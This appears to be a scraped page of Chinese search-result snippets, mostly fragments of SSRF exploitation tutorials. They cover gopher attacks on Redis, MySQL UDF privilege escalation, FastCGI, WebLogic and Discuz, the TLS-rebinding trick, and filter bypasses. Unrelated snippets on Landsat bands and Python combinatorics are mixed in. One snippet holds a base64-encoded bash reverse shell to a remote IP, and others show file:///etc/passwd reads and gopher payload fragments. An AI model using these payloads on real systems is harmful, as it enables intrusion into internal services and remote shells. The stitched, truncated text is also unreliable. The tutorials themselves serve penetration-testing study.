漏洞知识库 网络安全/渗透测试/代码审计/ 关注 SSRF漏洞原理与利用 什么是SSRF? SSRF(Server-Side Request Forgery),服务器端请求伪造;利用一个可以发起网络请求的服务,可以当做跳板来攻击其他服务。 Know IT, SSRF有什么能耐? ? 内外网的端口和服务探测 主机本地敏感数据的读取 内外网主机应用程序漏洞的利用 …… 等等 怎么找到SSRF漏洞? > SSRF漏洞的利用 访问URL: http://127.0.0.1/web/ssrf.php?url=www.baidu.com ? 数据包如下: GET /web/ssrf.php?
SSRF介绍 SSRF,服务器端请求伪造,服务器请求伪造,是由攻击者构造的漏洞,用于形成服务器发起的请求。通常,SSRF攻击的目标是外部网络无法访问的内部系统。 这里我们要介绍的是关于redis中SSRF的利用,如果有什么错误的地方还请师傅们不吝赐教/握拳。 Gopher协议可以说是SSRF中的万金油,。利用此协议可以攻击内网的 redis、ftp等等,也可以发送 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。 利用条件 能未授权或者能通过弱口令认证访问到Redis服务器。 利用 redis常见的SSRF攻击方式大概有这几种: 绝对路径写webshell 写ssh公钥 写contrab计划任务反弹shell 下面我们逐个实现。
可以尝试利用php内置类来进行反序列化。 Deserialization + __call + SoapClient + CRLF = SSRF 题目分析 打开题目看到只有几行代码 <? file_put_contents('flag.txt',$flag); } } $xff经过了array_pop()的处理,这个函数的作用是弹出数组最后一个单元(出栈),当我刚开始只传入了一个127.0.0.1时发现并没有利用成功
前言 SSRF漏洞在互联网公司中应该是除了越权之外最普遍的漏洞了。关于漏洞的原理,绕过,传统的扫端口、各种探测等利用方式等就不再赘述,这里分享下自己作为企业蓝军中常用的一些SSRF的利用途径。 SSRF攻击传统的组件、CMS等的常用途径不再赘述,这里举一些在大部分互联网公司中常用的 能够被SSRF进一步利用的中间件。 Erueka 利用点: 未授权访问 Erueka未授权访问漏洞。 2.5 K8s 利用点: 各种未授权访问 这个比较大,不一一说了,纯属看运气了。 2.7 SpringBoot Actuator 利用点: 未授权访问: 很多Actuator的端点拦截只是对外网而言,有些是在Nginx过滤了 或者在 filter设置的只允许内部网络访问,通过SSRF
可以看到ssh版本号为2.0 debian-6版本 2.远程利用:在存在ssrf地方输入 dict://127.0.0.1:22 ? 2.远程利用:在存在ssrf地方输入 file:///etc/passwd ? 0x02ssrf利用redis未授权getshell 通过gopher协议攻击Redis,如果内网中的Redis存在未授权访问漏洞,当Redis服务以root权限运行时,利用gopher协议攻击内网中的 8.攻击CentOS机器的Redis服务: 在SSRF处输入gopher://IP:端口/_payload: gopher://127.0.0.1:6379/_转换的数据内容: ? 成功反弹shell 0x03 ssrf常见的绕过方式 IP地址转换进制 添加端口 利用短地址进行302跳转(如192.168.1.1.xip.ip会自动重定向到192.168.1.1) 利用句号 还有很多绕过方式
利用SSRF可以进行内外网的端口和服务探测、主机本地敏感数据的读取、内外网主机应用程序漏洞的利用等等,可以说SSRF的危害不容小觑了。 0x02 漏洞发现 既然SSRF有这些危害,那我们要怎么发现哪里存在SSRF,发现了又怎么利用呢?接下来就好好唠唠这点。 测试 7.网站采集,网站抓取的地方:一些网站会针对你输入的url进行一些信息采集工作 8.数据库内置功能:数据库的比如mongodb的copyDatabase函数 9.邮件系统:比如接收邮件服务器地址 image=(地址)的可能存在SSRF漏洞 0x04 漏洞利用 1、一个简单的测试靶场 测试PHP代码: <? 0x05 绕过技巧 1、添加端口号:http://127.0.0.1:8080 2、短网址绕过:http://dwz.cn/11SMa 3、IP限制绕过:十进制转换、八进制转换、十六进制转换、不同进制组合转换
盲SSRF利用链术语表 介绍 什么是服务器请求伪造(SSRF)? 盲 SSRF(Blind SSRF) 在利用服务器端请求伪造时,我们经常会发现自己无法读取响应。这种行为通常被称为"盲SSRF(Blind SSRF)"。在这种情况下,我们如何证明影响? 这篇文章尽可能详细介绍每个已知的盲SSRF的漏洞利用链,并将随着更多技术的发现和分享而更新。 你可以在这里找到一个GitHub仓库来查看所有的这些技术:Blind SSRF Chains。 完成后,识别所有新发现的内部主机,并将它们作为盲SSRF链的一部分。 侧信道泄露 当利用盲SSRF漏洞时,你可能会泄漏有关返回响应的一些信息。 一个很容易被利用的Exporter是Redis Exporter。
什么是SSRF? SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,利用服务器端发起的安全漏洞。 0X06 利用Discuz的SSRF漏洞GetShell Discuz无条件限制ssrf漏洞(<=3.1测试是有这个漏洞) 实验环境: 172.28.100.109 为Discuz 3.1(Win10) 基本可以确认这里是有SSRF漏洞 使用header 来配合ssrf漏洞利用,在我公网服务器放了一个ssrf.php <? /x-httpd-php .php 这样apache就会把jpg也当作php解析;如果我们遇到限制了jpg后缀的ssrf漏洞就可以利用该方法,同理如果限制了txt的话。 0X09 常用挖掘SSRF漏洞的工具 利用F12,查看网站的网络请求 利用GoogleHacking,如site:www.baidu.com,然后查找网站是否有关于url的远程调用 作者:WHITE
> 该代码为一个ssrf漏洞的示例代码,可以访问/ssrf.php? url=http://www.baidu.com进行测试,若能实现跳转到百度的页面,或包含百度的页面即SSRF环境搭建成功 image-20211201133950257 漏洞利用 在这里就直接使用 所以在非交互模式下登录并操作MySQL只能在无需密码认证,未授权情况下进行,本文利用SSRF漏洞攻击MySQL也是在其未授权情况下进行的。 漏洞进行利用 image-20211201215924201 漏洞利用-UDF提权 提权前需要注意: •mysql(mariadb)必须使用root用户启动(不通过service或者systemctl 最后通过创建的自定义函数并执行系统命令将 shell 弹出来,原生命令如下: $ mysql -h127.0.0.1 -uroot -e "select sys_eval('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMy4yNDEvNDQ0NCAwPiYx
1700 阅读时长:17分钟 附件/链接:点击查看原文下载 声明:请勿用作违法用途,否则后果自负 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 前言 When TLS Hacks You出了一个利用 tls进行ssrf的姿势,而且赵师傅在(https://www.zhaoj.in/read-6681.html)也做了一些新研究,很早之前就想学习一下这个,不过一直咕,趁现在空下来了,研究一下. 这个是一个ssrf的新姿势,如果可以利用的话,只要对方服务器可以利用https协议,就可以打内网服务. 这里有一个坑,按照原作者github搭出来的话,301跳转以后就会报一个unexpected message的错误, 导致无法一直301跳转进行利用,最终我利用赵师傅改的tlslite-ng,再次魔改 dns服务器 python3 alternate-dns.py tlstest.example.com,127.0.0.1 -b 0.0.0.0 -t tlsserverip 127.0.0.1是要进行ssrf
Entering Passive Mode 类似 HTTP 的状态码和状态短语,而 (192,168,9,2,4,8) 代表让客户端到连接 192.168.9.2 的 4 * 256 + 8 = 1032 这个点是存在WebShell写入漏洞的,但是在不能写文件的环境下该如何利用呢?那么可以利用SSRF进行攻击。 那么这个时候我们便可以从 FTP 的被动模式入手,通过 SSRF 攻击内网应用。 SSRF利用FTP协议攻击Redis 假设内网中存在 Redis 并且可以未授权访问的话,我们也可以直接攻击 Redis,实现写入 Webshell、SSH 秘钥、计划任务等。 SSRF利用FTP协议攻击MySQL 有关如何利用MySQL未授权抓取数据包在上一节已经详细讲解过了,这里就不再讲解。 这里就直接使用上一节已经写入的动态链接库和用户定义函数直接执行系统命令。
利用WebLogic的SSRF漏洞探测内网信息 漏洞描述 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 在这里主要讲解SSRF的利用,所以就不对Redis的协议进行分析了,直接使用Exp进行利用。 之后会对Redis的漏洞进行深入学习。 •dir 数据库备份的文件放置路径•Dbfilename 备份文件的文件名 漏洞利用 推荐使用Gopherus可以帮助我们直接生成gopher payload,以利用SSRF GetShell。 在这里使用了一个大佬写好的python脚本进行利用: #! /zA1/v6iDds%252BuNUgaUKC7Ntx%252BHqDTB98Hbl8CmvVkWqvNd3D3lo1KF2qikNuel/Fx4inoi8T8ECGcXqUVkq8mB0sG0opbYTwNnFrwd4sY0eXD
SSRF漏洞之FastCGI利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击FastCGI 0x00.PHP-FPM FastCGI 未授权利用 首先我们使用Vulhub漏洞靶场快速搭建漏洞环境进行复现,感受一波漏洞的危害 SSRF来攻击本地PHP-FPM服务,达到任意代码执行的效果 我们通过CTFHub中的一道SSRF FastCGI协议题目具体进行利用 根据前面几篇SSRF系列的文章,我们对gopher协议已经有所了解 ,得出FastCGI 的利用大多数还是配合SSRF漏洞才能造成巨大危害的结论。 同时,也加深了PHP与Web Server之间通信的具体了解与认识 参考 Web安全基础学习之SSRF漏洞利用 Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 浅析php-fpm
0x00 背景介绍 2020年BlackHat大会上,Joshua Maddux介绍了一种针对SSRF的新颖利用思路,得到了广泛的关注。 0x04 攻击思路 结合以上知识,在遇到一个非通用的SSRF漏洞时,我们可以尝试使用以下思路,将非通用的SSRF漏洞变成通用SSRF漏洞: ? 0x05 攻击实践 0x051 配置DNS Server dns server设置第一次解析的ip地址为真实的ip,后续请求利用https server的响应301重定向,重新解析,从而解析为期望攻击的 触发SSRF漏洞 curl http://192.168.9.191/ssrf.php? 0x06 总结 HTTPS协议目的是为了对传输报文进行加密,防止中间人攻击,但是为了提高通信效率,对client、server端进行优化,导致了攻击行为的发生,在曾经的SSRF漏洞利用过程中,通过该议题的学习
Landsat TM (ETM+)7个波段可以组合很多RGB方案用于不同地物的解译,Landsat8的OLI陆地成像仪包括9个波段,可以组合更多的RGB方案。 ETM+传感器所有的波段,为了避免大气吸收特征,OLI对波段进行了重新调整,比较大的调整是OLI Band5(0.845–0.885 μm),排除了0.825μm处水汽吸收特征;OLI全色波段Band8波段范围较窄 对比表3,可以将表1和表2的组合方案结合使用。 4、5、3非标准假彩色图像(1)利用了一个红波段、两个红外波段,因此凡是与水有关的地物在图像中都会比较清楚;(2)强调显示水体,特别是水体边界很清晰,益于区分河渠与道路;(3)由于采用的都是红波段或红外波段 ,如下图为打开一个标准Landsat8数据,根据需求选择对应RGB合成显示即可。
1000600 PoC来源博客文章 https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html漏洞链利用 通过与CVE-2018-1000600链式结合,实现预认证完全响应SSRF攻击。
如何利用Python来实现数学组合计算?一起来看看吧~ 前言 开学几个星期了emmm 作业一如既往的多。。。。。。。 ≤n)个元素的所有组合的个数,叫做从n个不同元素中取出m个元素的组合数 定义 ? 组合是数学的重要概念之一。从 n 个不同元素中每次取出 m 个不同元素,不管其顺序合成一组,称为从 n 个元素中不重复地选取 m 个元素的一个组合。 所有这样的组合的种数称为组合数 计算公式 在线性写法中被写作C(n,m) ↓组合数的计算公式为↓ ? 代码 ↓代码严格遵循PEP 8,大家也不要例外哦↓ n_input_msg = "请输入组合数参数N:" m_input_msg = "请输入组合数参数M:" result_msg = "计算结果:"
以下是一些可以先尝试的IP地址: 127.0.0.0/8 192.168.0.0/16 10.0.0.0/8 注:这里提供一个指向其他保留IP地址的参考链接 (https://en.wikipedia.org 到这里,我想各位对SSRF有一个基本的了解了,接下来就开始学习一下如何利用SSRF。 - 那么攻击者究竟可以利用SSRF漏洞做什么? - 嗯,这通常取决于受攻击网络上提供的具体内部服务。 ? 几种利用SSRF漏洞的常见方法: 首先你需要先找到一个SSRF漏洞,然后怎么办呢? 由于攻击者不能直接从目标服务器提取信息,因此利用盲SSRF在很大程度上依赖于演绎。 利用HTTP状态代码和服务器响应时间,攻击者可以获得与常规SSRF类似的结果。 学习了如何利用,接下来才是重头戏,如何绕过SSRF的保护机制,笔者来进一步探讨攻击者如何利用SSRF拥有公司网络的例子。 ? ?
2、解决方案解决方案的关键是使用组合数来对幂集进行索引。组合数是指从一个集合中选择k个元素的方案数。例如,从集合{1, 2, 3}中选择2个元素,有3种方案:{1, 2}、{1, 3}和{2, 3}。 我们可以利用组合数来确定子集的大小,并根据子集的大小来确定子集在幂集中的位置。具体来说,我们首先计算集合中元素的总数n,然后根据n计算幂集的大小2^n。 对于索引k,我们可以使用以下公式来确定子集的大小:k = ∑C(n, k)其中C(n, k)表示从n个元素中选择k个元素的组合数。 map(lambda i: self.elements[i], indeces)if __name__ == "__main__": print "index of combination [8, 6, 3, 1, 0] is", kcombination_to_index([8, 6, 3, 1, 0]) print "5 combination at position 72 is",
这篇文章的漏洞源于下面这篇文章,文章中提到该漏洞影响A8, A8+, A6等多个版本,但很多版本我都找不到对应的源码,光A8就有一万个版本,下面我们尽可能的复现漏洞和探索Joern的可能性 https: SAXReader(); Reader xml_sr = new StringReader(xmlString); saxReader.setEncoding("UTF-8" 想要利用jdbc注入来调用H2进行进一步利用,其中有两个比较大的问题。 ,当我们尝试去做利用的时候会发现其实后台有额外的权限验证。 而在后续的利用条件收集中,也可以利用joern来快速挖掘和发现。